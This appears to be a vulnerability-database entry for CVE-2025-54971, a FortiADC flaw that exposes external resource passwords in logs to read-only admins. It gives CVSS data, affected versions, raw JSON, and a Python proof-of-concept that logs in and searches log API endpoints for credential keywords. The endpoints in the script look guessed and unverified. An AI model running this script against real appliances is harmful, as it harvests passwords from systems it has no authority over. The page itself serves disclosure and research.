Security Vulnerability Report
中文
CVE-2025-54971 CVSS 4.3 MEDIUM

CVE-2025-54971

Published: 2025-11-18 17:16:04
Last Modified: 2025-11-20 14:33:10
Source: [email protected]

Description

An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiADC 7.4.0, FortiADC 7.2 all versions, FortiADC 7.1 all versions, FortiADC 7.0 all versions, FortiADC 6.2 all versions may allow an admin with read-only permission to get the external resources password via the logs of the product

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* - VULNERABLE
FortiADC 7.4.0
FortiADC 7.2 (所有版本)
FortiADC 7.1 (所有版本)
FortiADC 7.0 (所有版本)
FortiADC 6.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54971 PoC - FortiADC Sensitive Information Disclosure # This PoC demonstrates the information disclosure vulnerability in FortiADC logs import requests import sys from requests.auth import HTTPBasicAuth def exploit_fortiadc_sensitive_info(base_url, username, password): """ Exploit CVE-2025-54971: Sensitive information disclosure via logs Requires: Valid admin account with read-only permissions """ print(f"[*] Targeting FortiADC at {base_url}") print(f"[*] Authenticating with user: {username}") # Step 1: Authenticate with read-only admin account session = requests.Session() login_url = f"{base_url}/api/v1/login" try: # Attempt authentication auth_data = { "username": username, "password": password } response = session.post(login_url, json=auth_data, verify=False, timeout=10) if response.status_code != 200: print("[-] Authentication failed") return None print("[+] Authentication successful") # Step 2: Access logs containing sensitive information # The vulnerability allows read-only admins to view logs with credentials log_endpoints = [ "/api/v1/log/system", "/api/v1/log/debug", "/api/v1/system/logs", "/api/v1/dashboard/log" ] sensitive_info = [] for endpoint in log_endpoints: print(f"[*] Querying {endpoint}...") response = session.get(f"{base_url}{endpoint}", timeout=10) if response.status_code == 200: data = response.json() # Search for password patterns in logs for log_entry in data.get('logs', []): log_content = str(log_entry) # Check for password-related patterns if any(keyword in log_content.lower() for keyword in ['password', 'secret', 'key', 'credential', 'token']): print(f"[!] Potential sensitive info found in log entry") sensitive_info.append(log_entry) if sensitive_info: print(f"\n[+] Found {len(sensitive_info)} potential sensitive information entries") for info in sensitive_info: print(info) return sensitive_info else: print("[-] No sensitive information found in accessible logs") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} https://fortiadc.local admin readonly_password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_fortiadc_sensitive_info(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54971", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:03.680", "lastModified": "2025-11-20T14:33:09.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiADC 7.4.0, FortiADC 7.2 all versions, FortiADC 7.1 all versions, FortiADC 7.0 all versions, FortiADC 6.2 all versions may allow an admin with read-only permission to get the external resources password via the logs of the product"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": "31187E7F-51A7-4397-A04A-07F45593E090"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-686", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.